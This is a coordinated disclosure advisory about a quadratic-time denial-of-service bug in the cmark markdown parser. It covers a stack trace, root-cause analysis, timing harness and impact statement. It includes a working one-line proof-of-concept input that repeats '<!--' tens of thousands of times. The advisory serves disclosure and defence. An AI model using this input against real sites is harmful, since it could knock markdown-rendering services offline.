Coordinated Disclosure Timeline

Summary

A crafted markdown document can trigger a quadratic complexity algorithm in cmark.

Product

cmark

Tested Version

Latest master: cd5b2f6

Details

Issue: quadratic behavior in handle_pointy_brace (GHSL-2022-098)

A markdown document containing a large number of repetitions of the characters <!-- can trigger quadratic behavior.

Proof of concept:

python3 -c 'print("</" + "<!--" * 80000)' | cmark

Increasing the number 80000 in the above command causes the running time to increase quadratically.
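The growth can be measured with a small timing harness. The following is a minimal sketch, assuming a cmark binary built from the affected commit is on the PATH; the helper names build_payload and time_cmark are hypothetical and are not part of cmark.

```python
import shutil
import subprocess
import time


def build_payload(n: int) -> str:
    """Return the proof-of-concept input: '</' followed by n copies of '<!--'."""
    return "</" + "<!--" * n


def time_cmark(n: int, cmark: str = "cmark") -> float:
    """Pipe the payload into the cmark binary and return the elapsed seconds."""
    data = (build_payload(n) + "\n").encode()
    start = time.perf_counter()
    # Output is discarded; only the running time is of interest here.
    subprocess.run([cmark], input=data, stdout=subprocess.DEVNULL, check=False)
    return time.perf_counter() - start


if __name__ == "__main__":
    if shutil.which("cmark") is None:
        print("cmark not found on PATH; skipping timing run")
    else:
        # Doubling n should roughly quadruple the time on an affected build.
        for n in (20000, 40000, 80000):
            print(n, f"{time_cmark(n):.2f}s")
```

On an affected build, each doubling of n would be expected to roughly quadruple the reported time; on an unaffected build the times should grow roughly linearly.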

This is a sample stack trace from the quadratic algorithm:

  1. _scan_html_comment (p=0x7ffff7c358af "!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<!--<"...) at src/scanners.c:5452
  2. 0x000055555556b480 in _scan_at (scanner=0x555555571ff9 <_scan_html_comment>, c=0x7fffffffbdc8, offset=9784) at src/scanners.c:17
  3. 0x0000555555569c9a in handle_pointy_brace (subj=0x7fffffffbdc0, options=0) at src/inlines.c:917
  4. 0x000055555556acd4 in parse_inline (subj=0x7fffffffbdc0, parent=0x5555555ab790, options=0) at src/inlines.c:1336
  5. 0x000055555556b09e in cmark_parse_inlines (mem=0x5555555a90e0 <DEFAULT_MEM_ALLOCATOR>, parent=0x5555555ab790, refmap=0x5555555aa570, options=0) at src/inlines.c:1398
  6. 0x000055555556545d in process_inlines (mem=0x5555555a90e0 <DEFAULT_MEM_ALLOCATOR>, root=0x5555555aa370, refmap=0x5555555aa570, options=0) at src/blocks.c:408
  7. 0x00005555555658ab in finalize_document (parser=0x5555555aa2c0) at src/blocks.c:530
  8. 0x0000555555567626 in cmark_parser_finish (parser=0x5555555aa2c0) at src/blocks.c:1303
  9. 0x0000555555562fa2 in main (argc=2, argv=0x7fffffffdfe8) at src/main.c:203

We believe that the quadratic behavior is caused by the call to scan_html_comment at src/inlines.c:917:

matchlen = scan_html_comment(&subj->input, subj->pos + 1);

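scan_html_comment is a regex, which scans to the end of the current line. Due to the malicious input string, it is called again after every < character. Each of those calls rescans most of the remaining input without finding a closing -->, so the total work grows quadratically with the number of repetitions.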
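The effect can be illustrated with a toy model. The sketch below is not cmark's actual scanner; it is a simplified stand-in, with the hypothetical names count_scan_steps and payload, that counts how many characters a naive scanner examines when it searches for a closing --> after every <!-- it encounters.

```python
def payload(n: int) -> str:
    """Same shape as the proof-of-concept input."""
    return "</" + "<!--" * n


def count_scan_steps(text: str) -> int:
    """Count characters examined by a naive scanner that, at every '<!--',
    walks forward to the end of the input looking for '-->'."""
    steps = 0
    for i, ch in enumerate(text):
        if ch != "<":
            continue
        # Toy stand-in for the comment scanner: require "!--" after '<'.
        if not text.startswith("!--", i + 1):
            continue
        j = i + 4
        while j < len(text):
            steps += 1
            if text.startswith("-->", j):
                break  # a terminator would stop the scan early
            j += 1
    return steps


if __name__ == "__main__":
    for n in (100, 200, 400):
        print(n, count_scan_steps(payload(n)))
```

Because the input never contains -->, every scan runs to the end of the input. In this model the step count for n repetitions is 2n(n-1), so doubling n roughly quadruples the work.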

This bug was introduced by commit 4470ff3, so it does not exist in the most recently released version: 0.30.2. However, other quadratic issues, such as issue 431, have been fixed since version 0.30.2, so it seems likely that some cmark users are running the latest master branch rather than version 0.30.2 and may be affected by this bug.

Impact

This issue could be used in a denial-of-service attack on websites that use cmark to render markdown documents.

CVE

Credit

This issue was discovered and reported by GHSL team member @kevinbackhouse (Kevin Backhouse).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2022-098 in any communication regarding this issue.